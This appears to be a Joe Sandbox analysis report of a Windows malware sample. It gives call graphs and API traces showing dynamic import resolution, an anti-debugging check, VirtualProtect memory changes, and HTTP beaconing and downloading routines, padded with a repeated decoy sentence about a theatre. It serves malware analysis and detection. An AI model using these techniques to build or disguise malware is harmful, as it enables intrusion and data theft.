7c5771 38472->38473 38474 7cab30 2 API calls 38473->38474 38475 7c577e 38474->38475 38476 7cab30 2 API calls 38475->38476 38477 7c578b 38476->38477 38478 7cab30 2 API calls 38477->38478 38479 7c5798 38478->38479 38480 7caa50 lstrcpy 38479->38480 38481 7c57a5 38480->38481 38482 7caa50 lstrcpy 38481->38482 38483 7c57b2 38482->38483 38484 7caa50 lstrcpy 38483->38484 38485 7c57bf 38484->38485 38486 7caa50 lstrcpy 38485->38486 38508 7c57cc 38486->38508 38487 7c5893 StrCmpCA 38487->38508 38488 7c58f0 StrCmpCA 38489 7c5a2c 38488->38489 38488->38508 38490 7cabb0 lstrcpy 38489->38490 38491 7c5a38 38490->38491 38492 7cab30 2 API calls 38491->38492 38494 7c5a46 38492->38494 38493 7cab30 lstrlen lstrcpy 38493->38508 38496 7cab30 2 API calls 38494->38496 38495 7c5aa6 StrCmpCA 38497 7c5be1 38495->38497 38495->38508 38501 7c5a55 38496->38501 38500 7cabb0 lstrcpy 38497->38500 38498 7caa50 lstrcpy 38498->38508 38499 7caab0 lstrcpy 38499->38508 38502 7c5bed 38500->38502 38503 7b16b0 lstrcpy 38501->38503 38505 7cab30 2 API calls 38502->38505 38526 7c5a61 38503->38526 38504 7b1590 lstrcpy 38504->38508 38506 7c5bfb 38505->38506 38510 7cab30 2 API calls 38506->38510 38507 7c5c5b StrCmpCA 38511 7c5c78 38507->38511 38512 7c5c66 Sleep 38507->38512 38508->38487 38508->38488 38508->38493 38508->38495 38508->38498 38508->38499 38508->38504 38508->38507 38509 7c5440 20 API calls 38508->38509 38519 7c5510 25 API calls 38508->38519 38521 7c59da StrCmpCA 38508->38521 38523 7cabb0 lstrcpy 38508->38523 38525 7c5b8f StrCmpCA 38508->38525 38509->38508 38513 7c5c0a 38510->38513 38514 7cabb0 lstrcpy 38511->38514 38512->38508 38515 7b16b0 lstrcpy 38513->38515 38516 7c5c84 38514->38516 38515->38526 38517 7cab30 2 API calls 38516->38517 38518 7c5c93 38517->38518 38520 7cab30 2 API calls 38518->38520 38519->38508 38522 7c5ca2 38520->38522 38521->38508 38524 7b16b0 lstrcpy 38522->38524 38523->38508 38524->38526 38525->38508 38526->37579 38528 7c76dc 38527->38528 38529 7c76e3 GetVolumeInformationA 38527->38529 38528->38529 38530 7c7721 38529->38530 38531 7c778c GetProcessHeap RtlAllocateHeap 38530->38531 38532 7c77b8 wsprintfA 38531->38532 38533 7c77a9 38531->38533 38535 7caa50 lstrcpy 38532->38535 38534 7caa50 lstrcpy 38533->38534 38536 7c5ff7 38534->38536 38535->38536 38536->37600 38538 7caab0 lstrcpy 38537->38538 38539 7b48e9 38538->38539 38740 7b4800 38539->38740 38541 7b48f5 38542 7caa50 lstrcpy 38541->38542 38543 7b4927 38542->38543 38544 7caa50 lstrcpy 38543->38544 38545 7b4934 38544->38545 38546 7caa50 lstrcpy 38545->38546 38547 7b4941 38546->38547 38548 7caa50 lstrcpy 38547->38548 38549 7b494e 38548->38549 38550 7caa50 lstrcpy 38549->38550 38551 7b495b InternetOpenA StrCmpCA 38550->38551 38552 7b4994 38551->38552 38553 7b4f1b InternetCloseHandle 38552->38553 38746 7c8cf0 38552->38746 38555 7b4f38 38553->38555 38761 7ba210 CryptStringToBinaryA 38555->38761 38556 7b49b3 38754 7cac30 38556->38754 38560 7b49c6 38561 7cabb0 lstrcpy 38560->38561 38566 7b49cf 38561->38566 38562 7cab30 2 API calls 38563 7b4f55 38562->38563 38564 7cacc0 4 API calls 38563->38564 38567 7b4f6b 38564->38567 38565 7b4f77 codecvt 38569 7caab0 lstrcpy 38565->38569 38570 7cacc0 4 API calls 38566->38570 38568 7cabb0 lstrcpy 38567->38568 38568->38565 38582 7b4fa7 38569->38582 38571 7b49f9 38570->38571 38572 7cabb0 lstrcpy 38571->38572 38573 7b4a02 38572->38573 38574 7cacc0 4 API calls 38573->38574 38575 7b4a21 38574->38575 38576 7cabb0 lstrcpy 38575->38576 38577 7b4a2a 38576->38577 38578 7cac30 3 API calls 38577->38578 38579 7b4a48 38578->38579 38580 7cabb0 lstrcpy 38579->38580 38581 7b4a51 38580->38581 38583 7cacc0 4 API calls 38581->38583 38582->37603 38584 7b4a70 38583->38584 38585 7cabb0 lstrcpy 38584->38585 38586 7b4a79 38585->38586 38587 7cacc0 4 API calls 38586->38587 38588 7b4a98 38587->38588 38589 7cabb0 lstrcpy 38588->38589 38590 7b4aa1 38589->38590 38591 7cacc0 4 API calls 38590->38591 38592 7b4acd 38591->38592 38593 7cac30 3 API calls 38592->38593 38594 7b4ad4 38593->38594 38595 7cabb0 lstrcpy 38594->38595 38596 7b4add 38595->38596 38597 7b4af3 InternetConnectA 38596->38597 38597->38553 38598 7b4b23 HttpOpenRequestA 38597->38598 38600 7b4b78 38598->38600 38601 7b4f0e InternetCloseHandle 38598->38601 38602 7cacc0 4 API calls 38600->38602 38601->38553 38603 7b4b8c 38602->38603 38604 7cabb0 lstrcpy 38603->38604 38605 7b4b95 38604->38605 38606 7cac30 3 API calls 38605->38606 38607 7b4bb3 38606->38607 38608 7cabb0 lstrcpy 38607->38608 38609 7b4bbc 38608->38609 38610 7cacc0 4 API calls 38609->38610 38611 7b4bdb 38610->38611 38612 7cabb0 lstrcpy 38611->38612 38613 7b4be4 38612->38613 38614 7cacc0 4 API calls 38613->38614 38615 7b4c05 38614->38615 38616 7cabb0 lstrcpy 38615->38616 38617 7b4c0e 38616->38617 38618 7cacc0 4 API calls 38617->38618 38619 7b4c2e 38618->38619 38620 7cabb0 lstrcpy 38619->38620 38621 7b4c37 38620->38621 38622 7cacc0 4 API calls 38621->38622 38623 7b4c56 38622->38623 38624 7cabb0 lstrcpy 38623->38624 38625 7b4c5f 38624->38625 38626 7cac30 3 API calls 38625->38626 38627 7b4c7d 38626->38627 38628 7cabb0 lstrcpy 38627->38628 38629 7b4c86 38628->38629 38630 7cacc0 4 API calls 38629->38630 38631 7b4ca5 38630->38631 38632 7cabb0 lstrcpy 38631->38632 38633 7b4cae 38632->38633 38634 7cacc0 4 API calls 38633->38634 38635 7b4ccd 38634->38635 38636 7cabb0 lstrcpy 38635->38636 38637 7b4cd6 38636->38637 38638 7cac30 3 API calls 38637->38638 38639 7b4cf4 38638->38639 38640 7cabb0 lstrcpy 38639->38640 38641 7b4cfd 38640->38641 38642 7cacc0 4 API calls 38641->38642 38643 7b4d1c 38642->38643 38644 7cabb0 lstrcpy 38643->38644 38645 7b4d25 38644->38645 38646 7cacc0 4 API calls 38645->38646 38647 7b4d46 38646->38647 38648 7cabb0 lstrcpy 38647->38648 38649 7b4d4f 38648->38649 38650 7cacc0 4 API calls 38649->38650 38651 7b4d6f 38650->38651 38652 7cabb0 lstrcpy 38651->38652 38653 7b4d78 38652->38653 38654 7cacc0 4 API calls 38653->38654 38655 7b4d97 38654->38655 38656 7cabb0 lstrcpy 38655->38656 38657 7b4da0 38656->38657 38658 7cac30 3 API calls 38657->38658 38659 7b4dbe 38658->38659 38660 7cabb0 lstrcpy 38659->38660 38661 7b4dc7 38660->38661 38662 7caa50 lstrcpy 38661->38662 38663 7b4de2 38662->38663 38664 7cac30 3 API calls 38663->38664 38665 7b4e03 38664->38665 38666 7cac30 3 API calls 38665->38666 38667 7b4e0a 38666->38667 38668 7cabb0 lstrcpy 38667->38668 38669 7b4e16 38668->38669 38670 7b4e37 lstrlen 38669->38670 38671 7b4e4a 38670->38671 38672 7b4e53 lstrlen 38671->38672 38760 7cade0 38672->38760 38674 7b4e63 HttpSendRequestA 38675 7b4e82 InternetReadFile 38674->38675 38676 7b4eb7 InternetCloseHandle 38675->38676 38681 7b4eae 38675->38681 38679 7cab10 38676->38679 38678 7cacc0 4 API calls 38678->38681 38679->38601 38680 7cabb0 lstrcpy 38680->38681 38681->38675 38681->38676 38681->38678 38681->38680 38767 7cade0 38682->38767 38684 7c1a14 StrCmpCA 38685 7c1a1f ExitProcess 38684->38685 38686 7c1a27 38684->38686 38687 7c1c12 38686->38687 38688 7c1afd StrCmpCA 38686->38688 38689 7c1b1f StrCmpCA 38686->38689 38690 7c1aad StrCmpCA 38686->38690 38691 7c1acf StrCmpCA 38686->38691 38692 7c1bc0 StrCmpCA 38686->38692 38693 7c1b41 StrCmpCA 38686->38693 38694 7c1ba1 StrCmpCA 38686->38694 38695 7c1b82 StrCmpCA 38686->38695 38696 7c1b63 StrCmpCA 38686->38696 38697 7cab30 lstrlen lstrcpy 38686->38697 38687->37605 38688->38686 38689->38686 38690->38686 38691->38686 38692->38686 38693->38686 38694->38686 38695->38686 38696->38686 38697->38686 38698->37611 38699->37613 38700->37619 38701->37621 38702->37627 38703->37629 38704->37633 38705->37637 38706->37641 38707->37647 38708->37649 38709->37653 38710->37667 38711->37671 38712->37670 38713->37666 38714->37670 38715->37688 38716->37673 38717->37675 38718->37679 38719->37684 38720->37685 38721->37691 38722->37698 38723->37700 38724->37723 38725->37727 38726->37728 38727->37724 38728->37728 38729->37737 38732 7caab0 lstrcpy 38731->38732 38733 7b16c3 38732->38733 38734 7caab0 lstrcpy 38733->38734 38735 7b16d5 38734->38735 38736 7caab0 lstrcpy 38735->38736 38737 7b16e7 38736->38737 38738 7caab0 lstrcpy 38737->38738 38739 7b15a3 38738->38739 38739->38464 38741 7b4816 38740->38741 38742 7b4888 lstrlen 38741->38742 38766 7cade0 38742->38766 38744 7b4898 InternetCrackUrlA 38745 7b48b7 38744->38745 38745->38541 38747 7caa50 lstrcpy 38746->38747 38748 7c8d04 38747->38748 38749 7caa50 lstrcpy 38748->38749 38750 7c8d12 GetSystemTime 38749->38750 38752 7c8d29 38750->38752 38751 7caab0 lstrcpy 38753 7c8d8c 38751->38753 38752->38751 38753->38556 38755 7cac41 38754->38755 38756 7cac98 38755->38756 38758 7cac78 lstrcpy lstrcat 38755->38758 38757 7caab0 lstrcpy 38756->38757 38759 7caca4 38757->38759 38758->38756 38759->38560 38760->38674 38762 7b4f3e 38761->38762 38763 7ba249 LocalAlloc 38761->38763 38762->38562 38762->38565 38763->38762 38764 7ba264 CryptStringToBinaryA 38763->38764 38764->38762 38765 7ba289 LocalFree 38764->38765 38765->38762 38766->38744 38767->38684

                                        Executed Functions

                                        Function 007C9BB0 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 660 7c9bb0-7c9bc4 call 7c9aa0 663 7c9bca-7c9dde call 7c9ad0 GetProcAddress * 21 660->663 664 7c9de3-7c9e42 LoadLibraryA * 5 660->664 663->664 666 7c9e5d-7c9e64 664->666 667 7c9e44-7c9e58 GetProcAddress 664->667 669 7c9e96-7c9e9d 666->669 670 7c9e66-7c9e91 GetProcAddress * 2 666->670 667->666 671 7c9e9f-7c9eb3 GetProcAddress 669->671 672 7c9eb8-7c9ebf 669->672 670->669 671->672 673 7c9ed9-7c9ee0 672->673 674 7c9ec1-7c9ed4 GetProcAddress 672->674 675 7c9f11-7c9f12 673->675 676 7c9ee2-7c9f0c GetProcAddress * 2 673->676 674->673 676->675
                                        APIs
                                        • GetProcAddress.KERNEL32(77190000,01651510), ref: 007C9BF1
                                        • GetProcAddress.KERNEL32(77190000,016515A0), ref: 007C9C0A
                                        • GetProcAddress.KERNEL32(77190000,016516C0), ref: 007C9C22
                                        • GetProcAddress.KERNEL32(77190000,01651720), ref: 007C9C3A
                                        • GetProcAddress.KERNEL32(77190000,01651528), ref: 007C9C53
                                        • GetProcAddress.KERNEL32(77190000,01658B08), ref: 007C9C6B
                                        • GetProcAddress.KERNEL32(77190000,01645088), ref: 007C9C83
                                        • GetProcAddress.KERNEL32(77190000,01645328), ref: 007C9C9C
                                        • GetProcAddress.KERNEL32(77190000,01651570), ref: 007C9CB4
                                        • GetProcAddress.KERNEL32(77190000,016516D8), ref: 007C9CCC
                                        • GetProcAddress.KERNEL32(77190000,01651588), ref: 007C9CE5
                                        • GetProcAddress.KERNEL32(77190000,01651738), ref: 007C9CFD
                                        • GetProcAddress.KERNEL32(77190000,01645208), ref: 007C9D15
                                        • GetProcAddress.KERNEL32(77190000,016515B8), ref: 007C9D2E
                                        • GetProcAddress.KERNEL32(77190000,016515D0), ref: 007C9D46
                                        • GetProcAddress.KERNEL32(77190000,01645228), ref: 007C9D5E
                                        • GetProcAddress.KERNEL32(77190000,016515E8), ref: 007C9D77
                                        • GetProcAddress.KERNEL32(77190000,01651600), ref: 007C9D8F
                                        • GetProcAddress.KERNEL32(77190000,01645148), ref: 007C9DA7
                                        • GetProcAddress.KERNEL32(77190000,01651828), ref: 007C9DC0
                                        • GetProcAddress.KERNEL32(77190000,01645108), ref: 007C9DD8
                                        • LoadLibraryA.KERNEL32(01651888,?,007C6CA0), ref: 007C9DEA
                                        • LoadLibraryA.KERNEL32(016518A0,?,007C6CA0), ref: 007C9DFB
                                        • LoadLibraryA.KERNEL32(016518B8,?,007C6CA0), ref: 007C9E0D
                                        • LoadLibraryA.KERNEL32(01651840,?,007C6CA0), ref: 007C9E1F
                                        • LoadLibraryA.KERNEL32(01651858,?,007C6CA0), ref: 007C9E30
                                        • GetProcAddress.KERNEL32(76850000,016517F8), ref: 007C9E52
                                        • GetProcAddress.KERNEL32(77040000,01651870), ref: 007C9E73
                                        • GetProcAddress.KERNEL32(77040000,01651810), ref: 007C9E8B
                                        • GetProcAddress.KERNEL32(75A10000,01658CF0), ref: 007C9EAD
                                        • GetProcAddress.KERNEL32(75690000,01645268), ref: 007C9ECE
                                        • GetProcAddress.KERNEL32(776F0000,01658BE8), ref: 007C9EEF
                                        • GetProcAddress.KERNEL32(776F0000,NtQueryInformationProcess), ref: 007C9F06
                                        Strings
                                        • NtQueryInformationProcess, xrefs: 007C9EFA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$LibraryLoad
                                        • String ID: NtQueryInformationProcess
                                        • API String ID: 2238633743-2781105232
                                        • Opcode ID: 5c224ea580f2d90540bb0453cbd52a6ea64843359be851cbe7fa2dcf0b1a842f
                                        • Instruction ID: 12742e4da2efc84508aee57ae632e2a56de9d999440e876d4a1e2c83d3ad9cd6
                                        • Opcode Fuzzy Hash: 5c224ea580f2d90540bb0453cbd52a6ea64843359be851cbe7fa2dcf0b1a842f
                                        • Instruction Fuzzy Hash: FFA10FB6518200DFD345EFE9EC8CA9A7BB9B74D701760861ABA09C7670E734D942CF60
                                        Function 007B4610 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 764 7b4610-7b46e5 RtlAllocateHeap 781 7b46f0-7b46f6 764->781 782 7b479f-7b47f9 VirtualProtect 781->782 783 7b46fc-7b479a 781->783 783->781
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 007B465F
                                        • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 007B47EC
                                        Strings
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007B4693
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007B4728
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007B47CB
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007B4784
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007B4688
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007B479F
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007B46B2
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007B476E
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007B4617
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007B4622
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007B4712
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007B46C8
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007B4672
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007B4707
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007B4667
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007B46FC
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007B47AA
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007B47C0
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007B471D
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007B4763
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007B46D3
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007B4638
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007B47B5
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007B46A7
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007B4643
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007B467D
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007B478F
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007B462D
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007B46BD
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007B4779
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateHeapProtectVirtual
                                        • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                        • API String ID: 1542196881-2218711628
                                        • Opcode ID: 31e2344c4ccd75d26dee963fef120f3990c71ce92d580949893913ae8115a052
                                        • Instruction ID: 8e1889515647a32240d282d54ec40d9fa3bef40bef4e2042533bb8aaf65071b7
                                        • Opcode Fuzzy Hash: 31e2344c4ccd75d26dee963fef120f3990c71ce92d580949893913ae8115a052
                                        • Instruction Fuzzy Hash: AE4123A07C2A346FC674B7E6887DEDD77B2DFC6711F80904BE88856380CA785600D726
                                        Function 007B62D0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1033 7b62d0-7b635b call 7caab0 call 7b4800 call 7caa50 InternetOpenA StrCmpCA 1040 7b635d 1033->1040 1041 7b6364-7b6368 1033->1041 1040->1041 1042 7b6559-7b6575 call 7caab0 call 7cab10 * 2 1041->1042 1043 7b636e-7b6392 InternetConnectA 1041->1043 1062 7b6578-7b657d 1042->1062 1044 7b6398-7b639c 1043->1044 1045 7b654f-7b6553 InternetCloseHandle 1043->1045 1047 7b63aa 1044->1047 1048 7b639e-7b63a8 1044->1048 1045->1042 1050 7b63b4-7b63e2 HttpOpenRequestA 1047->1050 1048->1050 1052 7b63e8-7b63ec 1050->1052 1053 7b6545-7b6549 InternetCloseHandle 1050->1053 1055 7b63ee-7b640f InternetSetOptionA 1052->1055 1056 7b6415-7b6455 HttpSendRequestA HttpQueryInfoA 1052->1056 1053->1045 1055->1056 1058 7b647c-7b649b call 7c8ad0 1056->1058 1059 7b6457-7b6477 call 7caa50 call 7cab10 * 2 1056->1059 1066 7b6519-7b6539 call 7caa50 call 7cab10 * 2 1058->1066 1067 7b649d-7b64a4 1058->1067 1059->1062 1066->1062 1069 7b6517-7b653f InternetCloseHandle 1067->1069 1070 7b64a6-7b64d0 InternetReadFile 1067->1070 1069->1053 1073 7b64db 1070->1073 1074 7b64d2-7b64d9 1070->1074 1073->1069 1074->1073 1079 7b64dd-7b6515 call 7cacc0 call 7cabb0 call 7cab10 1074->1079 1079->1070
                                        APIs
                                          • Part of subcall function 007CAAB0: lstrcpy.KERNEL32(?,00000000), ref: 007CAAF6
                                          • Part of subcall function 007B4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 007B4889
                                          • Part of subcall function 007B4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 007B4899
